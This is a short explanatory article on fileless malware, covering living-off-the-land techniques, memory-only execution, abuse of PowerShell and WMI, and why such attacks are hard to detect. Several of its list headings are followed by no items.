Fileless malware is a type of malicious software that uses legitimate applications already installed to infect a computer. It doesn’t rely on files and doesn’t leave a footprint since the malware is memory-based and not file-based. Fileless malware doesn’t require code to be installed, but an attacker still needs to be able to gain access to the environment to modify the native tools already in a user’s operating system. This fileless technique of using native tools to conduct a malicious attack is known as “living off the land.”
Common characteristics of a fileless malware attack include:
Well known fileless malware attacks include:
Fileless malware attacks use existing vulnerabilities already installed on a computer to infiltrate, take control, and carry out the attack. It doesn’t need to be installed or downloaded. A fileless attack may be triggered by a user-initiated action, such as clicking an advertisement that redirects to access Flash, and then uses other applications on the device.
Once into the system, specifically in the computer’s RAM, the malware injects malicious code. It gains access to native Windows tools, such as PowerShell and Windows Management Instrumentation (WMI) and injects code. These tools are targeted because they carry out system tasks for multiple endpoints.
This type of malware exists only in a computer’s RAM, meaning nothing is written directly to the hard drive. While this means an attacker has a smaller window of opportunity to execute the attack if a system reboot were to occur, it also means it’s more difficult to detect because there are no stored files for defensive security software to scan.
While fileless malware attacks are difficult to detect, it’s not impossible, and they do leave traces of evidence behind, including a compromise in a device’s system memory. Some antivirus software provides analytics that can detect when an application is executed at the same time as PowerShell. To minimize risk, consider using these approaches: